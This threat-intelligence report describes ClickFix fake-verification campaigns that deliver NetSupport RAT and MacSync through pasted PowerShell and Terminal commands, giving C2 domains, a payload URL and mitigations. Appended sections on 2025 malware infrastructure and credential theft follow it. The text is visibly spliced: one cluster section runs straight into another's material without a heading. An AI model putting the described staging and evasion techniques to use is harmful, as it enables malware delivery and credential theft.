To protect against these threats, security defenders should move beyond simple indicator blocking and prioritize aggressive behavioral hardening. Key recommendations include disabling the Windows Run dialog box via Group Policy Objects (GPO), implementing PowerShell Constrained Language Mode (CLM), and operationalizing Digital Risk Prevention tools such as Recorded Future's Malicious Websites to identify and mitigate threats to your digital assets.

Based on increasing use since 2024, Insikt Group assesses that the ClickFix methodology will very likely remain a primary initial access vector throughout 2026 as threat actors continue to social engineer victims to enable exploitation. Looking ahead, Insikt Group anticipates ClickFix lures will become increasingly technically adaptive, incorporating more selective browser fingerprinting, while continuing to use infrastructure that can be built and dismantled quickly. In addition to technical refinements, Insikt Group predicts that the social engineering component will continue to evolve, leveraging new techniques to lure victims into executing malicious commands.

Key Findings

• Insikt Group identified and tracked five distinct ClickFix activity clusters exhibiting significant operational variance in lure themes and infrastructure patterns despite a shared reliance on fraudulent human-verification lures. This indicates that the ClickFix methodology has transitioned into a standardized, high-ROI template adopted across a fragmented ecosystem of threat actors.
• While visually diverse, all analyzed clusters use a consistent execution framework that bypasses traditional browser security controls by shifting the point of exploitation to user-assisted manual commands. These campaigns target a wide variety of sectors, including accounting (QuickBooks), travel (Booking.com), and system optimization (macOS).
• ClickFix technical execution follows a standardized four-stage pattern: input of highly encoded or fragmented strings, native execution via legitimate system shells living-off-the-land binaries (LOLBins), remote ingress from threat actor-controlled infrastructure, and immediate in-memory execution. This methodology allows threat actors to stage and run remote code with limited and short-lived forensic artifacts on the host system.

Background

First documented in late 2023, ClickFix has transitioned from a niche social engineering tactic to a cornerstone of the global cybercriminal ecosystem. ClickFix is a social engineering methodology that lures victims into manually executing malicious commands by masquerading as a necessary technical resolution for fabricated system errors or human-verification prompts. This technique represents an evolutionary shift from the FakeUpdates (SocGholish) model, prioritizing manual user intervention to evade the increasingly robust security features of modern web browsers and automated endpoint detection systems. In this context, the methodology embodies a "think smart, not hard" approach. The simplicity of relying on a manual user action makes it a potent defensive evasion tactic: bypassing typical browser-based security makes it difficult to detect, while the high number of threat actors using it makes it difficult to track across a fragmented threat landscape.

The technical core of the methodology relies primarily on pastejacking, where background JavaScript populates a victim's clipboard with an obfuscated command while they are distracted by visual lures such as fraudulent reCAPTCHA or Cloudflare Turnstile overlays. In some instances, malicious commands are not automatically pasted into the victim’s clipboard, but rather, victims are manipulated into copying and running the command manually. By leveraging a living-off-the-land (LotL) approach, threat actors manipulate users into executing these commands directly within trusted system tools like the Windows Run dialog box, PowerShell, or the macOS Terminal. This user-assisted execution allows malicious scripts to execute silently and bypass traditional browser and endpoint security perimeters.

ClickFix has been weaponized by a diverse spectrum of threat actors, ranging from high-volume initial access brokers (IABs) to sophisticated state-sponsored groups such as BlueDelta (aka APT28) and the North Korean group PurpleBravo. The methodology enables a repeatable and scalable delivery framework capable of deploying a wide variety of secondary payloads, including infostealers like Lumma Stealer and Vidar, or remote access trojans (RATs) such as NetSupport RAT and Odyssey Stealer. These operations are frequently supported by highly adaptive, disposable infrastructure designed to maintain operational continuity even as individual domains are identified and blocked.

Technical Analysis

Insikt Group identified and tracked five emerging ClickFix clusters by leveraging the Recorded Future HTML Content Analysis dataset, which enables the systematic monitoring of embedded web artifacts. By pivoting on unique technical identifiers, including specific Document Object Model (DOM) hashes, hard-coded image source tags, and unique page titles, Insikt Group mapped ClickFix’s infrastructure and identified new malicious domains and infrastructure, facilitating the discovery of active domains and near real-time monitoring of cluster evolution.

Across the analyzed clusters, Insikt Group detailed the ClickFix commands victims were manipulated into executing on their systems. These commands relied heavily on LOLBins to achieve operational goals. By using LOLBins, threat actors leveraged native, legitimately signed executables to download malicious payloads to a victim's machine. Depending on the security implementation of personal machines or corporate endpoints, this methodology can effectively evade standard detections and foundational security principles.

ClickFix Clusters

Insikt Group identified five clusters (see Figure 1) that exhibited significant operational variance despite a shared reliance on the ClickFix social engineering technique. These clusters were defined by their infrastructure patterns and targeting approaches, ranging from logistics-themed lures to dual-platform selection logic. This indicates that the ClickFix methodology is being deployed across a fragmented ecosystem of threat actors, each tailoring the technique to suit their own delivery requirements and victim profiles.

These clusters were grouped based on observable patterns in infrastructure reuse, lure formatting, platform targeting, and operational adjustments over time. While core technical elements and delivery mechanisms overlap, each cluster maintained a distinct footprint within the broader landscape. Insikt Group categorized the activity into the following five clusters:

• Intuit QuickBooks: Targeted impersonation of accounting software, often leveraging aged domains to bypass security filters
• Booking.com: Used fraudulent domains to present fake verification portals
• Birdeye: A large-scale cluster that lures users of the AI marketing company Birdeye by spoofing domains and manipulating victims to use a malicious command to deliver NetSupport RAT.
• Dual-Platform Selection: Used operating system detection to deliver platform-tailored lures and malware
• macOS Storage Cleaning: Used counterfeit prompts mimicking macOS system optimization to trick users into executing encoded terminal commands

Figure 1: Overview of ClickFix and associated clusters (Source: Recorded Future)

Cluster 1: Intuit QuickBooks

Cluster 1 was observed operating from January 2026 to the time of writing, primarily targeting organizations through social engineering lures impersonating the accounting software Intuit QuickBooks. QuickBooks is widely used for tax preparation in the United States; given the campaign's active window coincides with the US tax season (typically January through April 15), Insikt Group assesses with moderate confidence that the timing was a calculated effort to target entities engaged in financial reporting. Although this cluster recently pivoted to targeting users of the US real estate marketplace Zillow, QuickBooks-related artifacts and brand-specific imagery remain deeply embedded throughout the Document Object Model (DOM) of the malicious landing pages.

Cluster 1 Profile

Figure 2: Overview of ClickFix Cluster 1 — Intuit QuickBooks (Source: Recorded Future)

Table 1: PowerShell commands observed across Cluster 1

Cluster 1 Infection Chain

The infection chain begins when a victim lands on a ClickFix landing page. The page presents a fraudulent human-verification interface (see Figure 3) that instructs the victim to complete specific "verification" steps.

Figure 3: Intuit QuickBooks-themed ClickFix page (Source: Recorded Future Web Scans)

By interacting with the page, the victim unknowingly copies a malicious command to their system clipboard. The technique often results in execution through native system utilities, such as Windows Run dialog and PowerShell, leveraging LOLBins to evade traditional browser and endpoint-based security controls.

Upon pasting the command, an obfuscated PowerShell script (Figure 4) executes in a hidden window. This stager uses self-referential function names to dynamically construct and invoke Invoke-RestMethod to the domain nobovcs[.]com.

Figure 4: Obfuscated PowerShell command executed in a hidden window, dynamically reconstructing and invoking code via iex (Source: Recorded Future)

This request triggers the retrieval of a short PowerShell stager (see Figure 5) that downloads a second-stage payload, bibi.php, saving it to the %TEMP% directory as script.ps1. This stager is the initial execution step that kicks off the NetSupport RAT installation.

Figure 5: Stager script to download second-stage script, bibi.php (Source: Recorded Future)

The bibi.php script is essential for the final deployment phase and for obfuscating on-disk artifacts. It contains a function called Get-RomanticName, which selects and combines strings from a thematic wordlist, including terms such as "Heart", "Soul", and "Desire", to generate a randomized folder name under %LOCALAPPDATA%, where the staging files are placed.

The script retrieves four primary files from nobovcs[.]com, detailed in Table 2.

Table 2: Filenames and SHA256 hashes of the files downloaded from nobovcs[.]com (Source: Recorded Future)

The script uses 7z.exe to extract at.7z (protected by the password “pppp”), which contains the NetSupport RAT binary, neservice.exe. Persistence is established by hijacking Startup shortcuts; if no existing shortcut is detected, the script extracts lnk.7z to the Startup folder to ensure the payload launches automatically upon system reboot.

Following successful execution, the binary neservice.exe performs an HTTP GET request to gologpoint[.]com to initiate command-and-control (C2) communications. gologpoint[.]com resolves to the IP address 62[.]164[.]177[.]230.

Cluster 2: Booking.com

Cluster 2 was observed operating from February 2026 to the time of writing, impersonating the travel agency Booking.com. Insikt Group tracked the cluster by pivoting on a unique DOM hash made possible by the threat actor’s repeated use of a unique HTML title and consistent image files. Indicators of compromise (IoCs) tagged in this cluster can be seen in the Recorded Future HTML Content Analysis. The landing pages for this cluster use a counterfeit reCAPTCHA v2 challenge, requiring victims to select all photos containing a "bucket" (Figure 6). Insikt Group observed that the same challenge photos are presented in the same order across all analyzed pages.

Cluster 2 Profile

Figure 7: Overview of ClickFix Cluster 2 — Booking.com (Source: Recorded Future)

Table 3: PowerShell commands observed across Cluster 2

Cluster 2 Infection Chain

The process begins when a victim interacts with the fake challenge. Upon completing the challenge, the victim is redirected to a verification page where a malicious PowerShell command (see Figure 8) is copied to the system clipboard. Instructions on the verification page manipulate the victim into opening the Windows Run dialog box and entering the command. Executing this malicious command starts the infection chain for NetSupport RAT.

Figure 8: Command from the booking campaign that reaches out to the payload server (Source: Recorded Future)

The PowerShell command provided in script.ps1 (see Figure 9) executes with the -NoProfile and -ExecutionPolicy Bypass flags to evade standard logging and security restrictions. Following execution, the system pulls four staging files to a directory named DesireSpark Serenade. This directory naming convention is functionally identical to the "romantic" naming methodology observed in Cluster 1.

Figure 9: DOM file from checkpulse[.]com that details the command to be run on the victim machine, suppressing the protections normally in place to pull down the PowerShell command and execute it (Source: Recorded Future)

The primary staging mechanism relies on script.ps1 to pull secondary payloads from the staging server. In one analyzed instance, scripts originating from thestayreserve[.]com reached out to checkpulses[.]com to retrieve the files detailed in Table 4.

Table 4: Filenames and SHA256 hashes of the files downloaded from checkpulses[.]com (Source: Recorded Future)

The 7z.exe utility is used to extract at.7z, which contains the NetSupport RAT binary neservice.exe. Persistence is established by adding a link to the system Startup folder.

The domains observed across this cluster use a similar PowerShell command pattern. However, once the command is executed, the infection chain varies slightly with the staging infrastructure being called. In the cases of sign-in-op-token[.]com and the thestayreserve[.]com domains, the malicious command is identical in terms of pattern and organization, but the hard-coded dropper domain is bkng-updt[.]com and checkpulses[.]com, respectively.

While staging domains vary, the final payloads across this cluster converge on the same NetSupport RAT C2 infrastructure (Table 5).

Table 5: IoCs observed in the Booking.com infection chain (Source: Recorded Future)

Following installation, the malware from thestayreserve[.]com initiates communication (Figure 10) with chrm-srv[.]com and ms-scedg[.]com, both of which resolve to 152[.]89[.]244[.]70. The domain hotelupdatesys[.]com , resolves to the same IP address as the NetSupport RAT C2 for sign-in-op-token[.]com.

Figure 10: POST Request from sign-in-op-token[.]com showing NetSupport interaction (Source: Recorded Future)

Cluster 3: Birdeye

Cluster 3 was observed operating from May 2024 until the time of writing. Previously reported on by Insikt Group, this cluster uses infrastructure centered on domains incorporating the keyword "bird" to deliver its ClickFix lure pages, trackable in Recorded Future’s HTML Content Analysis. These lures spoof Birdeye, an AI marketing company, to manipulate victims into executing malicious commands.

Cluster 3 Profile

Figure 11: Overview of ClickFix Cluster 3 — Birdeye (Source: Recorded Future)

Table 6: PowerShell command observed across Cluster 3

Cluster 3 Infection Chain

The infection chain begins when a victim visits a compromised site and is presented with a Cloudflare-style CAPTCHA challenge. Upon interacting with the page, the victim is prompted to run a command in the Windows Run dialog box. Insikt Group identified this cluster by pivoting on unique technical identifiers within the HTML artifacts, including a consistent and unique page title and a static image used across the infrastructure.

The command the victim is manipulated into running causes the victim’s device to reach out to alababababa[.]cloud to download a payload from hxxps[://]alababababa[.]cloud/cVGvQio6[.]txt. To further reduce suspicion, once the malicious command is executed, the victim is redirected to the legitimate birdeye.com website (see Figure 12).

Figure 12: The redirect to the legitimate Birdeye website (Source: Recorded Future)

Analysis of the JavaScript within the DOM for this cluster, provided in Appendix F, revealed insights into the threat actor's methods. A notable portion of the script uses seven obfuscated lines that are concatenated into a single string to be attached to the victim's clipboard. The developer left comments within the code that detail the deobfuscated purpose of each line. For example, one comment explicitly identifies the portion of the command calling PowerShell with specific flags (Figure 13).

Figure 13: Portion of JavaScript containing threat actor comments (Source: Recorded Future)

Furthermore, a comment written in Cyrillic at the beginning of the script translates to, "This should help bypass Cloudflare static analysis". This internal documentation suggests the threat actor is purposefully detailing their actions to refine bypass techniques against security scanners.

Historically, alababababa[.]cloud has been associated with the delivery of multiple malware strains, including Lumma Stealer and RedLine Stealer. The large volume of domains identified in this cluster, exceeding 40 unique entries, highlights the scale of the "run and repeat" model used to sustain this activity.

Cluster 4: Dual-Platform Selection

Cluster 4 was observed operating from March 2025 to the time of writing. This cluster is unique for its use of operating system detection to deliver tailored ClickFix lures for both Windows and macOS users. Unlike standard ClickFix behavior that typically pushes commands to the clipboard automatically, this variant provides detailed manual instructions, requiring the victim to open native system tools and manually copy and paste the provided staging payload. One of the ClickFix pages used to analyze this behavior was macosapp-apple[.]com, hosted at IP address 45[.]144[.]233[.]192.

Cluster 4 Profile

Figure 14: Overview of ClickFix Cluster 4 — Dual-Platform Selection (Source: Recorded Future)

Table 7: Encoded commands observed across Cluster 4

Cluster 4 Infection Chain

The infection chain begins when a victim lands on a ClickFix page that instructs them to verify they are human (Figure 15).

Figure 15: ClickFix page identified in Cluster 4 (Source: Recorded Future Web Scans)

Figure 23: Landing page for mac-os-helper[.]com (Source: Recorded Future)

Once the Terminal is open, the victim is prompted to execute a multi-stage command that purportedly "finds and removes temporary system files".

In reality, these commands (see Table 9) use different encoding layers to hide their true intent; the first example decodes a hexadecimal string to reveal a Base64-encoded client URL (curl) instruction, while the second directly decodes a Base64 string to run an executable command. Both methods ultimately bypass simple pattern matching by obfuscating the malicious payload until execution.

Table 9: Encoded and obfuscated ClickFix commands for macOS (Source: Recorded Future)

As shown in Table 10, the revealed curl instruction uses a compound set of arguments, in this cluster, -kfsSL, to facilitate silent delivery. These flags ensure that Transport Layer Security (TLS) certificate checks are bypassed, server-side errors are suppressed, and the process remains hidden from the user's view while following redirections to reach the final payload domain.

Table 10: Decoded and deobfuscated ClickFix commands for macOS (Source: Recorded Future)

Based on historic evidence (1, 2) and forensic patterns, Insikt Group assesses with high confidence that the information stealer MacSync was the primary payload used to infect victims in this cluster. The malicious commands on these pages caused the infected systems to reach out to a specific set of staging and C2 infrastructure, detailed in Table 11. Notably, while the domains varied, they were frequently observed behind Cloudflare to complicate network-level blocking.

Table 11: C2 servers identified for the macOS cleaner campaign (Source: Recorded Future)

Copy Command Analysis

Insikt Group analyzed commands across the five clusters identified in this research. While the visual lures and impersonated brands vary between groups like Cluster 1 (Intuit QuickBooks) and Cluster 5 (macOS Storage Cleaning), the underlying execution logic remains consistent. This "run and repeat" methodology relies on a narrow set of trusted LOLBins and lightweight obfuscation to stage remote code with minimal forensic artifacts.

The technical implementation of ClickFix follows a standardized four-stage pattern across all target operating systems, as summarized in Table 12.

Table 12: Standardized four-stage ClickFix execution pattern (Source: Recorded Future)

Insikt Group identified two primary command styles used in macOS-centric campaigns, such as Cluster 4 and Cluster 5, which are detailed in Table 13.

Table 13: Observed tactics, techniques, and procedures (TTPs) for macOS and Linux (zsh and bash) commands (Source: Recorded Future)

Windows-based commands, particularly those observed in Cluster 1 and Cluster 2, exhibit a higher degree of sophistication through "Command Swizzling" and case randomization, as shown in Table 14.

Table 14: Observed TTPs for Windows (PowerShell) commands (Source: Recorded Future)

Mitigations

To mitigate the threats posed by ClickFix social engineering and related living-off-the-land (LotL) techniques, Insikt Group recommends a defense-in-depth approach that combines proactive intelligence monitoring with aggressive hardening of native system utilities.

• Operationalize HTML Content Analysis: Recorded Future customers should use the HTML Content Analysis source to monitor for impersonations of their brand, which are leveraged to deliver ClickFix. Leverage the Recorded Future Intelligence Operations Platform to monitor for unique web artifacts, such as specific Document Object Model (DOM) hashes and page titles, to identify new ClickFix domains in real time.
• Use Recorded Future Threat Intelligence: Recorded Future customers can proactively mitigate this threat by operationalizing Recorded Future Intelligence Operations Platform data, specifically by leveraging continuously updated Risk Lists and by blocklisting IP addresses and domains associated with ClickFix to block communication with malicious infrastructure.
• Monitor Malicious Infrastructure Risk Lists: Continuously update security information and event management (SIEM) and endpoint detection and response (EDR) tools with Recorded Future Risk Lists to block traffic to identified staging and command-and-control (C2) domains.
• Use Malware Intelligence: Leverage the Recorded Future Intelligence Operations Platform to hunt for indicators of compromise (IoCs) associated with payloads identified in this report, such as NetSupport RAT, Odyssey Stealer, and Lumma Stealer.
• Leverage Network Intelligence: Use Recorded Future Network Intelligence to detect exfiltration events early (such as those linked to NetSupport RAT), which can help prevent intrusions before they escalate. This approach relies on comprehensive, proactive infrastructure discovery provided by Insikt Group and the analysis of vast amounts of network traffic.
• Use Identity Module: Recorded Future customers should leverage the Identity Module to monitor for credentials and passwords being sold on the dark web that have been stolen by information stealers.
• Disable Windows Run Dialog via Group Policy Objects (GPOs): For corporate environments, disable the Win+R keyboard shortcut and the Run command in the Start menu via Group Policy Objects (GPOs). This significantly hinders the ClickFix execution chain, as victims are typically instructed to paste malicious commands directly into this dialog box.
• Restrict Terminal and PowerShell Execution: Implement PowerShell Constrained Language Mode (CLM) and use AppLocker or Windows Defender Application Control (WDAC) to prevent the execution of unassigned scripts and the misuse of living-off-the-land binaries (LOLBins). On macOS, restrict Terminal and other shell interpreters (for example, zsh and bash) using application control policies enforced via mobile device management (MDM), and leverage System Integrity Protection (SIP) and endpoint security controls to limit unauthorized script execution and abuse of native command-line utilities.
• User Awareness and Training: Conduct targeted social engineering simulations that specifically educate users on the dangers of "manual verification" prompts that require copying and pasting commands into system utilities.

Outlook

The identification of five parallel operational clusters targeting diverse sectors, including accounting, travel, real estate, and legal services, indicates that the ClickFix methodology has transitioned from a niche technique to a standardized template within the cybercriminal ecosystem. This standardized "run and repeat" model is facilitating broader adoption by both lower-tier "traffers" and sophisticated advanced persistent threat (APT) groups. Threat actors are able to maintain operational continuity even when individual domains are blocked due to the availability of disposable infrastructure and shared technical templates.

Insikt Group assesses with high confidence that the ClickFix methodology will very likely remain a heavily used initial access vector throughout 2026. The continued success of ClickFix is driven by its ability to bypass advanced browser-based security controls by shifting the point of exploitation to user-assisted manual actions. As long as native system utilities such as PowerShell and Terminal remain accessible to end-users, ClickFix will continue to offer threat actors a high-return, low-complexity alternative to traditional exploit kits.

Looking ahead, ClickFix lures will likely become increasingly technically adaptive. Future iterations are expected to incorporate more granular browser fingerprinting to conditionally serve payloads based on a victim's hardware, geographic location, or organizational profile. Furthermore, since threat actors are already purposefully documenting bypass techniques for static analysis engines within their code, Insikt Group anticipates a long-term trend toward more resilient and obfuscated staging environments. This convergence of sophisticated social engineering and LotL techniques necessitates a shift in defensive strategy, moving away from simple indicator blocking toward aggressive behavioral hardening of the system utilities that ClickFix relies upon.

Appendix A: Indicators of Compromise

Appendix B: Cluster 1 — Intuit QuickBooks Indicators

Appendix C: bibi.php Script

Appendix D: Cluster 2 — Booking.com Indicators

Appendix E: Cluster 3 — Birdeye Indicators

Appendix F: Birdeye Cluster Javascript

Appendix G: Cluster 4 — Dual-Platform Selection Indicators

In 2025, Insikt Group significantly expanded its tracking of malicious infrastructure, broadening
coverage across additional malware families and threat categories spanning cybercriminal and APT activity. This expansion included deeper analysis of infrastructure types, enhanced integration of data sources such as Recorded Future Network Intelligence®, improved threat detection methodologies,more granular higher-tier infrastructure insights, expanded victimology analysis, and a new focus on so-called threat activity enablers (TAEs). While many patterns identified in 2024 persisted, including Cobalt Strike’s dominance among offensive security tools (OSTs), AsyncRAT and QuasarRAT leading the remote access trojan (RAT) landscape, the widespread use of open-source or cracked malware variants, and the continued prevalence of Android malware within the mobile threat ecosystem, Insikt Group observed several notable shifts and emerging trends throughout 2025.

For example, although Cobalt Strike remained the most prominent OST, its relative share of detected command-and-control (C2) servers declined as detection coverage expanded and competing tools gained traction. Tools such as RedGuard, Ligolo, and Supershell saw significant growth in use throughout 2025. Following law enforcement disruption efforts targeting LummaC2, Vidar and other infostealers partially filled the gap, reflecting continued volatility in the infostealer ecosystem. Similar fluctuations were observed in the loader and dropper landscape, where new malware families consistently emerged, including CastleLoader, attributed to GrayBravo. Additionally, Insikt Group observed sustained and widespread use of traffic distribution systems (TDS), including activity by TAG-124, GrayCharlie, and other threat actors.

Defenders should leverage the insights from this report to strengthen security controls by prioritizing the detection and mitigation of the most prevalent malware families and infrastructure techniques. This includes enhancing network monitoring capabilities and deploying relevant detection mechanisms such as YARA, Sigma, and Snort rules. Organizations should also invest in tracking evolving malicious infrastructure dynamics, conducting threat simulations to validate their defensive posture, and maintaining continuous monitoring of the broader threat landscape. With respect to legitimate infrastructure services (LIS), defenders must carefully balance blocking, flagging, or allowing high-risk services based on assessed criticality and organizational risk tolerance.

As malicious infrastructure continues to evolve alongside improving detection capabilities, Insikt Group anticipates that many current trends will persist into 2026. Rather than dramatic shifts, change is likely to be driven by incremental innovation, adaptation to defensive measures, and reactions to public reporting and law enforcement actions. Threat actors are expected to continue leveraging legitimate tools, services, and content delivery networks (CDNs) such as Cloudflare, a pattern also heavily observed among multiple APT groups, to blend malicious activity with legitimate traffic. While not yet widely observed at the infrastructure layer, Insikt Group assesses that artificial intelligence may increasingly be leveraged to support evasion and operational resilience. The “as-a-service” ecosystem is likely to continue expanding across malware categories, enabling scalability and lowering barriers to entry for threat actors. Although public reporting and sanctions targeting certain TAEs have triggered increased scrutiny, the ecosystem’s underlying economic and operational logic is expected to remain

intact, allowing established actors to continue operating. At the same time, Insikt Group anticipates increasingly assertive international law enforcement actions targeting malicious infrastructure, including coordinated takedowns and other disruption efforts.

Key Findings

• Infostealers remained the primary infection vector in 2025, with malware-as-a-service (MaaS)offerings dominating. Vidar outperformed competitors, Lumma proved resilient despite law enforcement and doxxing pressure, and the wider ecosystem remained highly volatile.
• Cobalt Strike retained clear dominance in OST detections (~50%) despite declining share, while Metasploit and Mythic held their positions. RedGuard, Ligolo, and Supershell expanded notably, and jQuery again led as the most prevalent malleable C2 profile by detections and geographic reach.
• The malware ecosystem remained anchored in MaaS and open-source tooling across desktop and mobile, with AsyncRAT and Quasar RAT leading the RAT landscape, DcRAT and REMCOS RAT gaining share, and families such as XWorm, SectopRAT, and GOSAR entering the top tier, while Android dominated mobile activity (nine of the top ten families) amid rising use of mercenary spyware.
• Droppers, loaders, and TDS remained dynamic but resilient in 2025, with high loader turnover following Operation Endgame 2024, driven by Latrodectus expansion and the rise of MintsLoader and GrayBravo’s CastleLoader, alongside sustained and widespread TDS activity linked to TAG-124, GrayCharlie, and other threat actors.
• Lastly, in 2025, Insikt Group pivoted to identifying TAEs via the Threat Density List, highlighting high-risk networks such as Virtualine Technologies, often transiting via aurologic GmbH, that sustained operations through Regional Internet Registry (RIR) resource abuse and rapid rebranding despite sanctions and law enforcement pressure.

Background

Insikt Group proactively identifies and monitors infrastructure linked to hundreds of malware families,threat actors, and related artifacts, including phishing kits, scanners, and relay networks. Through daily,automated validation using proprietary methods, Insikt Group delivers accurate risk representation,enabling Recorded Future customers to strengthen their detection and defense capabilities.

Building on Insikt Group’s annual malicious infrastructure reports from 2022, 2023, and 2024, this year’s report delivers a concise, data-driven overview of malicious infrastructure observed throughout 2025. While the percentages presented throughout the report are intended to provide insight into trends and the state of malicious infrastructure in 2025, it is important to note that Insikt Group continuously adds new detections for both existing and emerging families, which makes year-over-year comparisons imperfect.

This year, the focus continues to be on the synergy between passive infrastructure detection,
higher-tier infrastructure insights powered by Recorded Future Network Intelligence, and victim
identification. It also expands to examine trends across the ecosystem of TAEs that underpin cyber threats, including how sanctions against selected entities have reshaped that landscape. Overall, this report is intended for anyone interested in malicious infrastructure, providing a high-level overview of its current state along with summaries of key findings to support informed decision-making and offer a broad perspective on this rapidly evolving landscape.

Recognizing the challenge of categorizing malware types in a mutually exclusive manner due to their overlapping functionalities, this report establishes a set of malware categories to facilitate analysis, as detailed in Appendix A, with brief definitions for each. Notably, certain malware categories, such as crypters, have been intentionally excluded because they typically lack network artifacts.

Beyond examining malicious infrastructure through the lens of malware categories, Insikt Group also monitors it by type, assigning each a distinct risk score within the Recorded Future Intelligence Operations Platform®. This differentiation reflects varying levels of severity. For instance, network traffic to or from a C2 server in a corporate network may indicate a higher risk compared to the presence of a management panel, as the former typically implies active malicious activity. The infrastructure types defined by Insikt Group are detailed in Appendix B.

Download the full report

Credential theft is the dominant initial access vector for enterprise breaches. In 2025, Recorded Future detected:

• 1.95 billion malware combo list credential exposures
• 36 million database combo list credential exposures
• 24 million database dump credential exposures
• 892 million malware log credential exposures

Five findings stand out from the data:

1. Credential theft accelerated as the year progressed. Recorded Future identified 50% more credentials in the second half of 2025 than in the first half of the year. 90% more credentials were identified in the last three months of the year than in the first three months
2. Stolen credentials are targeted, not random. Of the 7 million credentials indexed with identifiable authorization URLs, 63.2% were tied to authentication systems. VPNs, RMM tools, cloud platforms, and detection software also featured prominently — meaning attackers are often going directly for the systems that provide the broadest access and, in some cases, the ability to blind security teams entirely.
3. Infostealer malware is outpacing traditional breach detection. Each compromised device yielded an average of 87 stolen credentials. The scale and precision of modern infostealers means a single infected endpoint — including a personal device used to access corporate systems — can expose an entire organization.
4. MFA alone is no longer sufficient protection. 276 million of the credentials indexed in 2025 included active session cookies, meaning attackers can bypass multi-factor authentication entirely. This represents 31% of all malware-sourced credentials.
5. Detection speed is the decisive advantage. Over half of all credentials (53%) were indexed within one week of exfiltration, and 36.4% within 24 hours. Organizations that act on intelligence quickly can intervene before stolen credentials are exploited.

The Scale of the Problem: Compromised Credentials in 2025

Volume Grew Throughout the Year

Credential compromise from malware logs was not a static risk in 2025 — it compounded. Recorded Future observed a consistent upward trend throughout the year, with the second half producing 50% more indexed credentials than the first.

The final three months of the year were particularly active: They saw 90% more volume than the first three months, reflecting both the continued proliferation of infostealer malware-as-a-service (MaaS) and the disruption and reformation of major malware families mid-year (covered in detail in the malware section below).

CHART 1: Monthly credential volume from malware logs, full year 2025 (Source: Recorded Future)

What this means for security teams: Seasonal or quarterly threat reviews are insufficient. The volume and pace of credential exposure in 2025 demands continuous monitoring — not periodic audits.

What do Those Credentials Actually Unlock?

CHART 2: Top authorization URL categories, 2025 (Source: Recorded Future)

More credentials exposed means more doors open to attackers. The authorization URL data from 2025 reveals exactly which doors they're targeting — and the picture is stark.

Of the 7 million credentials with high-risk authorization URLs indexed in 2025, 63.2% were tied to authentication systems. The next largest categories were web content management (9.95%) and cloud computing (7.58%), followed by remote monitoring and management tools (6.19%) and email infrastructure (3.87%).

This is not a random distribution. Authentication systems, cloud platforms, and remote access tools — VPNs at 2.4% and RMM tools at 6.19% — are precisely the systems that give attackers the broadest foothold inside an organization. A single stolen credential for an authentication portal or VPN can serve as the entry point for lateral movement, privilege escalation, and ultimately a full breach.

The presence of detection and response software (1.17%) and SIEM platforms (0.06%) in this list is particularly notable. Credentials for the tools organizations rely on to detect attacks are themselves being stolen — giving attackers the ability to blind security teams before they strike.

What this means for security teams: The value of a stolen credential is determined by what it unlocks. Prioritize monitoring and rapid response for credentials tied to authentication systems, remote access tools, cloud infrastructure, and security platforms — these can represent the highest-leverage targets for attackers operating with stolen credentials.

A Global Problem With Regional Concentration

Compromised credentials were indexed from organizations across the globe. The ten countries with the highest credential volume in 2025 were:

Table 1: Credentials indexed by country (Source: Recorded Future)

MAP 1: Credentials indexed by country (Source: Recorded Future)

The breadth of this data underscores that credential theft is not concentrated in a single region or industry — it is a universal risk. Organizations with global workforces, multinational supply chains, or international customer bases face exposure across multiple geographies simultaneously.

The Anatomy of a Compromise: What Attackers Actually Steal

87 Credentials Per Device

When an employee's device is infected with infostealer malware, the damage rarely stops at one account. In 2025, the average compromised device yielded 87 stolen credentials — spanning corporate applications, personal accounts, and cloud services accessed from the same machine.

Recorded Future's Compromised Host Incident Reports surface the full scope of each device-level infection, including the malware family responsible, file paths, IP addresses, and infection timelines. This context is what separates actionable intelligence from a list of leaked passwords.

Image 1: Incident Report results in Recorded Future Identity Intelligence

What this means for security teams: A single alert should trigger a device-level incident response, not just a password reset. Understanding what else was on that machine — and what else may have been exfiltrated — is essential to containing the full extent of the exposure.

The Cookie Problem: Why MFA Isn't Enough

One of the most significant findings from 2025 is the volume of credentials that included active session cookies alongside stolen passwords. Recorded Future indexed 276 million credentials with cookies — 31% of all malware-sourced credentials — a figure that grew 30% from the first half of the year to the second half.

Session cookies allow attackers to authenticate as a user without entering a password or completing an MFA challenge. They effectively render secondary authentication controls irrelevant for as long as the session remains active.

December was the single highest month for cookie-bearing credential exposure, indexing 18% more than the next highest month (November).

CHART 3: Monthly volume of credentials with cookies, 2025 (Source: Recorded Future)

What this means for security teams: MFA enrollment is necessary but not sufficient. Organizations should monitor for session cookie theft specifically, enforce shorter session token lifespans for high-risk applications, and treat any credential exposure from an infostealer log as a potential authentication bypass — not just a password reset trigger.

The Infostealer Ecosystem: How the Malware Landscape Shifted in 2025

LummaC2: The Year's Dominant Threat

LummaStealer emerged as the most widely deployed infostealer of 2025. Operating under a malware-as-a-service model since late 2022, it matured significantly over the past year, targeting Windows systems to harvest browser credentials, session cookies, cryptocurrency wallets, and two-factor authentication tokens.

Its distribution relied heavily on social engineering — fake software downloads and "ClickFix" techniques that trick users into executing malicious commands disguised as CAPTCHA challenges. Recent campaigns used CastleLoader for delivery, running obfuscated payloads in memory to evade detection.

In May 2025, a coordinated law enforcement action neutralized more than 2,300 LummaC2 command-and-control domains. The disruption was significant — but not fatal. LummaStealer operators migrated to bulletproof hosting services and employed sophisticated sandbox evasion techniques, including trigonometric analysis of mouse movements to avoid automated detection environments. Activity continued under private, select-affiliate operations through the remainder of the year.

How the Rest of the Ecosystem Responded

The 2025 infostealer landscape was shaped as much by law enforcement disruption as by attacker innovation. Each takedown created a vacuum that other malware families quickly filled.

Early 2025: The late-2024 law enforcement actions against RedLine and META pushed users toward emerging MaaS alternatives, consolidating volume around LummaC2 and accelerating its dominance through Q2.

Mid-2025: Following the LummaC2 disruption in May, established families — Rhadamanthys, Vidar, and StealC — absorbed the displaced activity. Rhadamanthys led through the summer until its own infrastructure was taken down by law enforcement in November 2025. Vidar stepped into the lead position thereafter.

Rebranding as a survival strategy: Disruption prompted reinvention. StealC relaunched as StealC v2. Vidar operators attempted a similar rebrand. These moves reflect a deliberate effort by malware developers to obscure continuity and frustrate attribution.

macOS: Atomic macOS Stealer (AMOS) dominated the macOS market through most of 2025, disappearing in October before returning in February 2026. MacSync (formerly Mac.C) emerged as the primary commodity macOS infostealer by year end.

Private operations grew: Increased law enforcement pressure on publicly accessible MaaS tools pushed sophisticated threat actors toward private infostealers with restricted affiliate access. Acreed (also known as ACR Stealer) and Odyssey Stealer represented the most significant private-operation families of 2025. Private Lumma operations also continued post-disruption.

